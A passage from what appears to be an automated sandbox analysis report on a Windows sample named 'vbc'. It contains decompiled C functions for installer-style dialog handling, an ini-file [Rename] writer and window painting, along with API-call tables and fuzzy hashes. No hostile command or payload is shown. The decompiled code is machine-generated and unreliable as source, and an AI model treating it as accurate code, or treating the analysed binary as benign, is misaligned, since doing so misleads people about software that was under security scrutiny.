          					E004045CA(_a4);
          					_t300 = 0;
          					_v16 = 0;
          					if( *0x7a8acc <= 0) {
          						L19:
          						SetWindowLongW(_v8, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) & 0x000000fb);
          						goto L20;
          					} else {
          						_t319 = _v24 + 8;
          						_v32 = _t319;
          						do {
          							_t278 =  &(_t319[0x10]);
          							if( *_t278 != 0) {
          								_v64 = _t278;
          								_t279 =  *_t319;
          								_v88 = _v16;
          								_t311 = 0x20;
          								_v84 = 0xffff0002;
          								_v80 = 0xd;
          								_v68 = _t311;
          								_v44 = _t300;
          								_v72 = _t279 & _t311;
          								if((_t279 & 0x00000002) == 0) {
          									if((_t279 & 0x00000004) == 0) {
          										 *( *0x7a1f80 + _t300 * 4) = SendMessageW(_v8, 0x1132, 0,  &_v88);
          									} else {
          										_v16 = SendMessageW(_v8, 0x110a, 3, _v16);
          									}
          								} else {
          									_v80 = 0x4d;
          									_v48 = 1;
          									_t284 = SendMessageW(_v8, 0x1132, 0,  &_v88);
          									_v36 = 1;
          									 *( *0x7a1f80 + _t300 * 4) = _t284;
          									_v16 =  *( *0x7a1f80 + _t300 * 4);
          								}
          							}
          							_t300 = _t300 + 1;
          							_t319 =  &(_v32[0x818]);
          							_v32 = _t319;
          						} while (_t300 <  *0x7a8acc);
          						if(_v36 != 0) {
          							L20:
          							if(_v20 != 0) {
          								E004045FF(_v8);
          								goto L23;
          							} else {
          								ShowWindow(_v12, 5);
          								E004045FF(_v12);
          								L93:
          								return E00404631(_a8, _a12, _a16);
          							}
          						}
          						goto L19;
          					}
          				}
          			}


























































          0x0040503e
          0x00405057
          0x0040505c
          0x00405064
          0x0040506a
          0x00405080
          0x00405083
          0x004052ae
          0x004052b5
          0x004052c9
          0x004052b7
          0x004052b9
          0x004052bc
          0x004052bd
          0x004052c4
          0x004052c4
          0x004052d5
          0x004052e3
          0x004052e6
          0x004052fc
          0x00405371
          0x00405374
          0x00405376
          0x00405380
          0x0040538e
          0x0040538e
          0x00405390
          0x0040539a
          0x004053a0
          0x004053a3
          0x004053a6
          0x004053c1
          0x004053a8
          0x004053b2
          0x004053b2
          0x004053a6
          0x0040539a
          0x00000000
          0x00405374
          0x00405301
          0x0040530c
          0x00405311
          0x00405318
          0x0040531d
          0x00405321
          0x0040532c
          0x0040532c
          0x00405330
          0x00405334
          0x00405338
          0x0040534b
          0x0040533a
          0x0040533a
          0x00405341
          0x00405347
          0x00405343
          0x00405343
          0x00405343
          0x00405341
          0x0040534f
          0x00405351
          0x00405364
          0x00405367
          0x0040536a
          0x0040536a
          0x00405334
          0x00000000
          0x00405321
          0x00405303
          0x0040530a
          0x00000000
          0x00000000
          0x00000000
          0x00000000
          0x00000000
          0x00000000
          0x004053c4
          0x004053c4
          0x004053cb
          0x0040543c
          0x00405444
          0x0040544c
          0x0040544c
          0x00405455
          0x00405457
          0x0040545e
          0x00405461
          0x00405461
          0x00405467
          0x0040546e
          0x00405471
          0x00405471
          0x00405477
          0x0040547d
          0x00405483
          0x00405483
          0x00405490
          0x004055f1
          0x004055f8
          0x00405615
          0x0040561b
          0x0040562d
          0x0040562d
          0x00000000
          0x00405496
          0x00405498
          0x0040549d
          0x004054a2
          0x004054a7
          0x004054a9
          0x004054a9
          0x004054aa
          0x004054ab
          0x004054ad
          0x004054ad
          0x004054b5
          0x004054f6
          0x004054f8
          0x00405508
          0x0040550b
          0x00405510
          0x00405517
          0x0040551a
          0x004055bc
          0x004055c5
          0x004055cd
          0x004055cd
          0x004055db
          0x004055ec
          0x004055ec
          0x00000000
          0x004055db
          0x00405520
          0x00405523
          0x00405529
          0x0040552e
          0x00405530
          0x00405532
          0x00405538
          0x0040553f
          0x00405544
          0x0040554b
          0x0040554e
          0x0040554e
          0x00405555
          0x00405561
          0x00405565
          0x00405567
          0x00405567
          0x00405557
          0x00405559
          0x00405559
          0x00405587
          0x00405593
          0x004055a2
          0x004055a2
          0x004055a4
          0x004055a7
          0x004055b0
          0x00000000
          0x004054b7
          0x004054c2
          0x004054c5
          0x004054ca
          0x004054cc
          0x004054d0
          0x004054e0
          0x004054ea
          0x004054ec
          0x004054ef
          0x00000000
          0x00000000
          0x00000000
          0x00000000
          0x004054d2
          0x004054d2
          0x004054d8
          0x004054da
          0x004054da
          0x004054db
          0x004054dc
          0x00000000
          0x004054d2
          0x004054b5
          0x00405490
          0x004053d3
          0x00000000
          0x004053e9
          0x004053f3
          0x004053f8
          0x00000000
          0x00000000
          0x0040540a
          0x0040540f
          0x0040541b
          0x0040541b
          0x0040541d
          0x0040542c
          0x0040542e
          0x00405432
          0x00405435
          0x00000000
          0x00405435
          0x004053d3
          0x00405089
          0x0040508e
          0x00405097
          0x0040509e
          0x004050b0
          0x004050bb
          0x004050c1
          0x004050cf
          0x004050e3
          0x004050e8
          0x004050f5
          0x004050fa
          0x00405110
          0x00405121
          0x0040512e
          0x0040512e
          0x00405131
          0x00405137
          0x00405139
          0x0040513c
          0x00405141
          0x00405146
          0x00405148
          0x00405148
          0x00405168
          0x00405168
          0x0040516a
          0x0040516b
          0x00405170
          0x00405176
          0x0040517a
          0x0040517f
          0x00405187
          0x0040518b
          0x00405190
          0x00405195
          0x0040519d
          0x004051a0
          0x00405270
          0x00405283
          0x00000000
          0x004051a6
          0x004051a9
          0x004051ac
          0x004051af
          0x004051af
          0x004051b5
          0x004051be
          0x004051c1
          0x004051c5
          0x004051c8
          0x004051cb
          0x004051d4
          0x004051dd
          0x004051e0
          0x004051e3
          0x004051e6
          0x00405224
          0x0040524f
          0x00405226
          0x00405235
          0x00405235
          0x004051e8
          0x004051eb
          0x004051f9
          0x00405203
          0x0040520b
          0x00405212
          0x0040521d
          0x0040521d
          0x004051e6
          0x00405255
          0x00405256
          0x00405262
          0x00405262
          0x0040526e
          0x00405289
          0x0040528c
          0x004052a9
          0x00000000
          0x0040528e
          0x00405293
          0x0040529c
          0x0040562f
          0x00405641
          0x00405641
          0x0040528c
          0x00000000
          0x0040526e
          0x004051a0

          APIs
          • GetDlgItem.USER32(?,000003F9), ref: 0040504F
          • GetDlgItem.USER32(?,00000408), ref: 0040505A
          • GlobalAlloc.KERNEL32(00000040,?), ref: 004050A4
          • LoadImageW.USER32 ref: 004050BB
          • SetWindowLongW.USER32 ref: 004050D4
          • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 004050E8
          • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 004050FA
          • SendMessageW.USER32(?,00001109,00000002), ref: 00405110
          • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 0040511C
          • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 0040512E
          • DeleteObject.GDI32(00000000), ref: 00405131
          • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 0040515C
          • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405168
          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00405203
          • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 00405233
            • Part of subcall function 004045FF: SendMessageW.USER32(00000028,?,00000001,0040442A), ref: 0040460D
          • SendMessageW.USER32(?,00001132,00000000,?), ref: 00405247
          • GetWindowLongW.USER32(?,000000F0), ref: 00405275
          • SetWindowLongW.USER32 ref: 00405283
          • ShowWindow.USER32(?,00000005), ref: 00405293
          • SendMessageW.USER32(?,00000419,00000000,?), ref: 0040538E
          • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004053F3
          • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405408
          • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 0040542C
          • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 0040544C
          • ImageList_Destroy.COMCTL32(?), ref: 00405461
          • GlobalFree.KERNEL32(?), ref: 00405471
          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004054EA
          • SendMessageW.USER32(?,00001102,?,?), ref: 00405593
          • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 004055A2
          • InvalidateRect.USER32(?,00000000,00000001), ref: 004055CD
          • ShowWindow.USER32(?,00000000), ref: 0040561B
          • GetDlgItem.USER32(?,000003FE), ref: 00405626
          • ShowWindow.USER32(00000000), ref: 0040562D
          Strings
          Memory Dump Source
          • Source File: 00000004.00000002.984631376.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000004.00000002.984628051.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984636669.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984640728.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984645184.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984839010.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984846067.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984851092.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984855453.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984866339.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984871682.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984876092.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
          Similarity
          • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
          • String ID: $M$N
          • API String ID: 2564846305-813528018
          • Opcode ID: 6abe7a227f943e402f923de28771de89d858ca3350371f72f3cd38ce524b5995
          • Instruction ID: 1c888212402988323542b136e78769e30209d338b2ecbb40b03ff66d659fa363
          • Opcode Fuzzy Hash: 6abe7a227f943e402f923de28771de89d858ca3350371f72f3cd38ce524b5995
          • Instruction Fuzzy Hash: 25027A70900609EFDB20DFA5CD85AAF7BB5FB85314F10812AF611BA2E1DB798951CF18
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 91%
          			E00404789(struct HWND__* _a4, int _a8, unsigned int _a12, WCHAR* _a16) {
          				char _v8;
          				int _v12;
          				void* _v16;
          				struct HWND__* _t56;
          				signed int _t75;
          				signed short* _t76;
          				signed short* _t78;
          				long _t92;
          				int _t103;
          				signed int _t110;
          				intOrPtr _t113;
          				WCHAR* _t114;
          				signed int* _t116;
          				WCHAR* _t117;
          				struct HWND__* _t118;
          
          				if(_a8 != 0x110) {
          					if(_a8 != 0x111) {
          						L13:
          						if(_a8 != 0x4e) {
          							if(_a8 == 0x40b) {
          								 *0x79ff54 =  *0x79ff54 + 1;
          							}
          							L27:
          							_t114 = _a16;
          							L28:
          							return E00404631(_a8, _a12, _t114);
          						}
          						_t56 = GetDlgItem(_a4, 0x3e8);
          						_t114 = _a16;
          						if( *((intOrPtr*)(_t114 + 8)) == 0x70b &&  *((intOrPtr*)(_t114 + 0xc)) == 0x201) {
          							_t103 =  *((intOrPtr*)(_t114 + 0x1c));
          							_t113 =  *((intOrPtr*)(_t114 + 0x18));
          							_v12 = _t103;
          							_v16 = _t113;
          							_v8 = 0x7a6a40;
          							if(_t103 - _t113 < 0x800) {
          								SendMessageW(_t56, 0x44b, 0,  &_v16);
          								SetCursor(LoadCursorW(0, 0x7f02));
          								_push(1);
          								_t44 =  &_v8; // 0x7a6a40
          								E00404A38(_a4,  *_t44);
          								SetCursor(LoadCursorW(0, 0x7f00));
          								_t114 = _a16;
          							}
          						}
          						if( *((intOrPtr*)(_t114 + 8)) != 0x700 ||  *((intOrPtr*)(_t114 + 0xc)) != 0x100) {
          							goto L28;
          						} else {
          							if( *((intOrPtr*)(_t114 + 0x10)) == 0xd) {
          								SendMessageW( *0x7a8aa8, 0x111, 1, 0);
          							}
          							if( *((intOrPtr*)(_t114 + 0x10)) == 0x1b) {
          								SendMessageW( *0x7a8aa8, 0x10, 0, 0);
          							}
          							return 1;
          						}
          					}
          					if(_a12 >> 0x10 != 0 ||  *0x79ff54 != 0) {
          						goto L27;
          					} else {
          						_t116 =  *0x7a0f60 + 0x14;
          						if(( *_t116 & 0x00000020) == 0) {
          							goto L27;
          						}
          						 *_t116 =  *_t116 & 0xfffffffe | SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
          						E004045EC(SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
          						E00404A14();
          						goto L13;
          					}
          				}
          				_t117 = _a16;
          				_t75 =  *(_t117 + 0x30);
          				if(_t75 < 0) {
          					_t75 =  *( *0x7a7a7c - 4 + _t75 * 4);
          				}
          				_t76 =  *0x7a8ad8 + _t75 * 2;
          				_t110 =  *_t76 & 0x0000ffff;
          				_a8 = _t110;
          				_t78 =  &(_t76[1]);
          				_a16 = _t78;
          				_v16 = _t78;
          				_v12 = 0;
          				_v8 = E0040473A;
          				if(_t110 != 2) {
          					_v8 = E00404700;
          				}
          				_push( *((intOrPtr*)(_t117 + 0x34)));
          				_push(0x22);
          				E004045CA(_a4);
          				_push( *((intOrPtr*)(_t117 + 0x38)));
          				_push(0x23);
          				E004045CA(_a4);
          				CheckDlgButton(_a4, (0 | ( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
          				E004045EC( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001);
          				_t118 = GetDlgItem(_a4, 0x3e8);
          				E004045FF(_t118);
          				SendMessageW(_t118, 0x45b, 1, 0);
          				_t92 =  *( *0x7a8ab0 + 0x68);
          				if(_t92 < 0) {
          					_t92 = GetSysColor( ~_t92);
          				}
          				SendMessageW(_t118, 0x443, 0, _t92);
          				SendMessageW(_t118, 0x445, 0, 0x4010000);
          				SendMessageW(_t118, 0x435, 0, lstrlenW(_a16));
          				 *0x79ff54 = 0;
          				SendMessageW(_t118, 0x449, _a8,  &_v16);
          				 *0x79ff54 = 0;
          				return 0;
          			}


















          0x0040479b
          0x004048c8
          0x00404925
          0x00404929
          0x004049f6
          0x004049f8
          0x004049f8
          0x004049fe
          0x004049fe
          0x00404a01
          0x00000000
          0x00404a08
          0x00404937
          0x0040493d
          0x00404947
          0x00404952
          0x00404955
          0x00404958
          0x00404963
          0x00404966
          0x0040496d
          0x0040497a
          0x0040498b
          0x00404991
          0x00404993
          0x00404999
          0x004049a7
          0x004049ad
          0x004049ad
          0x0040496d
          0x004049b7
          0x00000000
          0x004049c2
          0x004049c6
          0x004049d6
          0x004049d6
          0x004049dc
          0x004049e8
          0x004049e8
          0x00000000
          0x004049ec
          0x004049b7
          0x004048d3
          0x00000000
          0x004048e5
          0x004048ea
          0x004048f0
          0x00000000
          0x00000000
          0x00404919
          0x0040491b
          0x00404920
          0x00000000
          0x00404920
          0x004048d3
          0x004047a1
          0x004047a4
          0x004047a9
          0x004047ba
          0x004047ba
          0x004047c2
          0x004047c5
          0x004047c9
          0x004047cc
          0x004047d0
          0x004047d3
          0x004047d6
          0x004047d9
          0x004047e0
          0x004047e2
          0x004047e2
          0x004047ec
          0x004047f9
          0x00404803
          0x00404808
          0x0040480b
          0x00404810
          0x00404827
          0x0040482e
          0x00404841
          0x00404844
          0x00404858
          0x0040485f
          0x00404864
          0x00404869
          0x00404869
          0x00404877
          0x00404885
          0x00404897
          0x0040489c
          0x004048ac
          0x004048ae
          0x00000000

          APIs
          • CheckDlgButton.USER32(?,-0000040A,00000001), ref: 00404827
          • GetDlgItem.USER32(?,000003E8), ref: 0040483B
          • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404858
          • GetSysColor.USER32 ref: 00404869
          • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404877
          • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 00404885
          • lstrlenW.KERNEL32(?), ref: 0040488A
          • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404897
          • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004048AC
          • GetDlgItem.USER32(?,0000040A), ref: 00404905
          • SendMessageW.USER32(00000000), ref: 0040490C
          • GetDlgItem.USER32(?,000003E8), ref: 00404937
          • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 0040497A
          • LoadCursorW.USER32 ref: 00404988
          • SetCursor.USER32(00000000), ref: 0040498B
          • LoadCursorW.USER32 ref: 004049A4
          • SetCursor.USER32(00000000), ref: 004049A7
          • SendMessageW.USER32(00000111,00000001,00000000), ref: 004049D6
          • SendMessageW.USER32(00000010,00000000,00000000), ref: 004049E8
          Strings
          Memory Dump Source
          • Source File: 00000004.00000002.984631376.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000004.00000002.984628051.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984636669.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984640728.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984645184.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984839010.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984846067.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984851092.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984855453.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984866339.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984871682.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984876092.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
          Similarity
          • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorlstrlen
          • String ID: @jz$N
          • API String ID: 3103080414-4087404676
          • Opcode ID: 2f7aa64e3dc70d49155a5c32c4c6c2cb2c3818e72aa53dab6a0d1c61e372e6f3
          • Instruction ID: a92c684f90d09e790cb96c84d129e3e4002e0b0c6609d0ca9bf02dd30757374c
          • Opcode Fuzzy Hash: 2f7aa64e3dc70d49155a5c32c4c6c2cb2c3818e72aa53dab6a0d1c61e372e6f3
          • Instruction Fuzzy Hash: D861A2B1900209BFDB109F61DD85AAA7BA9FB85315F00803AF705B62E1C77C9D51DF98
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 100%
          			E004062B4(void* __ecx) {
          				void* __ebx;
          				void* __edi;
          				void* __esi;
          				long _t12;
          				long _t24;
          				char* _t31;
          				int _t37;
          				void* _t38;
          				intOrPtr* _t39;
          				long _t42;
          				WCHAR* _t44;
          				void* _t46;
          				void* _t48;
          				void* _t49;
          				void* _t52;
          				void* _t53;
          
          				_t38 = __ecx;
          				_t44 =  *(_t52 + 0x14);
          				 *0x7a5628 = 0x55004e;
          				 *0x7a562c = 0x4c;
          				if(_t44 == 0) {
          					L3:
          					_t2 = _t52 + 0x1c; // 0x7a5e28
          					_t12 = GetShortPathNameW( *_t2, 0x7a5e28, 0x400);
          					if(_t12 != 0 && _t12 <= 0x400) {
          						_t37 = wsprintfA(0x7a5228, "%ls=%ls\r\n", 0x7a5628, 0x7a5e28);
          						_t53 = _t52 + 0x10;
          						E004066AB(_t37, 0x400, 0x7a5e28, 0x7a5e28,  *((intOrPtr*)( *0x7a8ab0 + 0x128)));
          						_t12 = E0040615E(0x7a5e28, 0xc0000000, 4);
          						_t48 = _t12;
          						 *(_t53 + 0x18) = _t48;
          						if(_t48 != 0xffffffff) {
          							_t42 = GetFileSize(_t48, 0);
          							_t6 = _t37 + 0xa; // 0xa
          							_t46 = GlobalAlloc(0x40, _t42 + _t6);
          							if(_t46 == 0 || E004061E1(_t48, _t46, _t42) == 0) {
          								L18:
          								return CloseHandle(_t48);
          							} else {
          								if(E004060C3(_t38, _t46, "[Rename]\r\n") != 0) {
          									_t49 = E004060C3(_t38, _t21 + 0xa, "\n[");
          									if(_t49 == 0) {
          										_t48 =  *(_t53 + 0x18);
          										L16:
          										_t24 = _t42;
          										L17:
          										E00406119(_t24 + _t46, 0x7a5228, _t37);
          										SetFilePointer(_t48, 0, 0, 0);
          										E00406210(_t48, _t46, _t42 + _t37);
          										GlobalFree(_t46);
          										goto L18;
          									}
          									_t39 = _t46 + _t42;
          									_t31 = _t39 + _t37;
          									while(_t39 > _t49) {
          										 *_t31 =  *_t39;
          										_t31 = _t31 - 1;
          										_t39 = _t39 - 1;
          									}
          									_t24 = _t49 - _t46 + 1;
          									_t48 =  *(_t53 + 0x18);
          									goto L17;
          								}
          								lstrcpyA(_t46 + _t42, "[Rename]\r\n");
          								_t42 = _t42 + 0xa;
          								goto L16;
          							}
          						}
          					}
          				} else {
          					CloseHandle(E0040615E(_t44, 0, 1));
          					_t12 = GetShortPathNameW(_t44, 0x7a5628, 0x400);
          					if(_t12 != 0 && _t12 <= 0x400) {
          						goto L3;
          					}
          				}
          				return _t12;
          			}



















          0x004062b4
          0x004062bd
          0x004062c4
          0x004062ce
          0x004062e2
          0x0040630a
          0x00406311
          0x00406315
          0x00406319
          0x00406339
          0x00406340
          0x0040634a
          0x00406357
          0x0040635c
          0x00406361
          0x00406365
          0x00406374
          0x00406376
          0x00406383
          0x00406387
          0x00406422
          0x00000000
          0x0040639d
          0x004063aa
          0x004063ce
          0x004063d2
          0x004063f1
          0x004063f5
          0x004063f5
          0x004063f7
          0x00406400
          0x0040640b
          0x00406416
          0x0040641c
          0x00000000
          0x0040641c
          0x004063d4
          0x004063d7
          0x004063e2
          0x004063de
          0x004063e0
          0x004063e1
          0x004063e1
          0x004063e9
          0x004063eb
          0x00000000
          0x004063eb
          0x004063b5
          0x004063bb
          0x00000000
          0x004063bb
          0x00406387
          0x00406365
          0x004062e4
          0x004062ef
          0x004062f8
          0x004062fc
          0x00000000
          0x00000000
          0x004062fc
          0x0040642d

          APIs
          • CloseHandle.KERNEL32(00000000), ref: 004062EF
          • GetShortPathNameW.KERNEL32 ref: 004062F8
            • Part of subcall function 004060C3: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,004063A8,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004060D3
            • Part of subcall function 004060C3: lstrlenA.KERNEL32(00000000,?,00000000,004063A8,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00406105
          • GetShortPathNameW.KERNEL32 ref: 00406315
          • wsprintfA.USER32 ref: 00406333
          • GetFileSize.KERNEL32(00000000,00000000,007A5E28,C0000000,00000004,007A5E28,?,?,?,?,?), ref: 0040636E
          • GlobalAlloc.KERNEL32(00000040,0000000A,?,?,?,?), ref: 0040637D
          • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 004063B5
          • SetFilePointer.KERNEL32(0040A5B0,00000000,00000000,00000000,00000000,007A5228,00000000,-0000000A,0040A5B0,00000000,[Rename],00000000,00000000,00000000), ref: 0040640B
          • GlobalFree.KERNEL32(00000000), ref: 0040641C
          • CloseHandle.KERNEL32(00000000), ref: 00406423
            • Part of subcall function 0040615E: GetFileAttributesW.KERNELBASE(00000003,00403113,007B6800,80000000,00000003), ref: 00406162
            • Part of subcall function 0040615E: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00406184
          Strings
          Memory Dump Source
          • Source File: 00000004.00000002.984631376.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000004.00000002.984628051.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984636669.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984640728.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984645184.000000000040C000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984839010.000000000077C000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984846067.0000000000782000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984851092.0000000000786000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984855453.0000000000788000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984866339.00000000007A6000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984871682.00000000007B5000.00000004.00000001.01000000.00000004.sdmpDownload File
          • Associated: 00000004.00000002.984876092.00000000007B9000.00000002.00000001.01000000.00000004.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_4_2_400000_vbc.jbxd
          Similarity
          • API ID: File$CloseGlobalHandleNamePathShortlstrlen$AllocAttributesCreateFreePointerSizelstrcpywsprintf
          • String ID: %ls=%ls$(Vz$(^z$(^z$[Rename]
          • API String ID: 2171350718-2000197835
          • Opcode ID: 88b5ac268f0a1f1c2fdae64f0923303a12147287a2ba527380340a6ee5c0cda9
          • Instruction ID: 6cadb61bc7003589c9facc341004653e1fa6c0793f9c109ef5d6a16b2289e69d
          • Opcode Fuzzy Hash: 88b5ac268f0a1f1c2fdae64f0923303a12147287a2ba527380340a6ee5c0cda9
          • Instruction Fuzzy Hash: 2D313571600705BBD2206B669D48F1B3A9CEF85714F16003EFD42FA2C2DA7DD82586BD
          Uniqueness

          Uniqueness Score: -1.00%

          C-Code - Quality: 90%
          			E00401000(struct HWND__* _a4, void* _a8, signed int _a12, void* _a16) {
          				struct tagLOGBRUSH _v16;
          				struct tagRECT _v32;
          				struct tagPAINTSTRUCT _v96;
          				struct HDC__* _t70;
          				struct HBRUSH__* _t87;
          				struct HFONT__* _t94;
          				long _t102;
          				signed int _t126;
          				struct HDC__* _t128;
          				intOrPtr _t130;
          
          				if(_a8 == 0xf) {
          					_t130 =  *0x7a8ab0;
          					_t70 = BeginPaint(_a4,  &_v96);
          					_v16.lbStyle = _v16.lbStyle & 0x00000000;
          					_a8 = _t70;
          					GetClientRect(_a4,  &_v32);
          					_t126 = _v32.bottom;
          					_v32.bottom = _v32.bottom & 0x00000000;
          					while(_v32.top < _t126) {
          						_a12 = _t126 - _v32.top;
          						asm("cdq");
          						asm("cdq");
          						asm("cdq");
          						_v16.lbColor = 0 << 0x00000008 | (( *(_t130 + 0x50) & 0x000000ff) * _a12 + ( *(_t130 + 0x54) & 0x000000ff) * _v32.top) / _t126 & 0x000000ff;
          						_t87 = CreateBrushIndirect( &_v16);
          						_v32.bottom = _v32.bottom + 4;
          						_a16 = _t87;
          						FillRect(_a8,  &_v32, _t87);
          						DeleteObject(_a16);
          						_v32.top = _v32.top + 4;
          					}
          					if( *(_t130 + 0x58) != 0xffffffff) {
          						_t94 = CreateFontIndirectW( *(_t130 + 0x34));
          						_a16 = _t94;
          						if(_t94 != 0) {
          							_t128 = _a8;
          							_v32.left = 0x10;
          							_v32.top = 8;
          							SetBkMode(_t128, 1);
          							SetTextColor(_t128,  *(_t130 + 0x58));
          							_a8 = SelectObject(_t128, _a16);
          							DrawTextW(_t128, 0x7a7aa0, 0xffffffff,  &_v32, 0x820);
          							SelectObject(_t128, _a8);
          							DeleteObject(_a16);
          						}
          					}
          					EndPaint(_a4,  &_v96);
          					return 0;
          				}
          				_t102 = _a16;
          				if(_a8 == 0x46) {
          					 *(_t102 + 0x18) =  *(_t102 + 0x18) | 0x00000010;
          					 *((intOrPtr*)(_t102 + 4)) =  *0x7a8aa8;
          				}
          				return DefWindowProcW(_a4, _a8, _a12, _t102);
          			}













          0x0040100a
          0x00401039
          0x00401047
          0x0040104d
          0x00401051
          0x0040105b
          0x00401061
          0x00401064
          0x004010f3
          0x00401089
          0x0040108c
          0x004010a6
          0x004010bd
          0x004010cc
          0x004010cf
          0x004010d5
          0x004010d9
          0x004010e4
          0x004010ed
          0x004010ef
          0x004010ef
          0x00401100
          0x00401105
          0x0040110d
          0x00401110
          0x00401112
          0x00401118
          0x0040111f
          0x00401126
          0x00401130
          0x00401142
          0x00401156
          0x00401160
          0x00401165
          0x00401165
          0x00401110
          0x0040116e
          0x00000000
          0x00401178
          0x00401010
          0x00401013
          0x00401015
          0x0040101f
          0x0040101f
          0x00000000

          APIs
          • DefWindowProcW.USER32(?,00000046,?,?), ref: 0040102C
          • BeginPaint.USER32(?,?), ref: 00401047
          • GetClientRect.USER32 ref: 0040105B
          • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
          • FillRect.USER32 ref: 004010E4
          • DeleteObject.GDI32(?), ref: 004010ED
          • CreateFontIndirectW.GDI32(?), ref: 00401105
          • SetBkMode.GDI32(00000000,00000001), ref: 00401126
          • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
          • SelectObject.GDI32(00000000,?), ref: 00401140
          • DrawTextW.USER32(00000000,007A7AA0,000000FF,00000010,00000820), ref: 00401156
          • SelectObject.GDI32(00000000,00000000), ref: 00401160
          • DeleteObject.GDI32(?), ref: 00401165
          • EndPaint.USER32(?,?), ref: 0040116E
          Strings
          Memory Dump Source
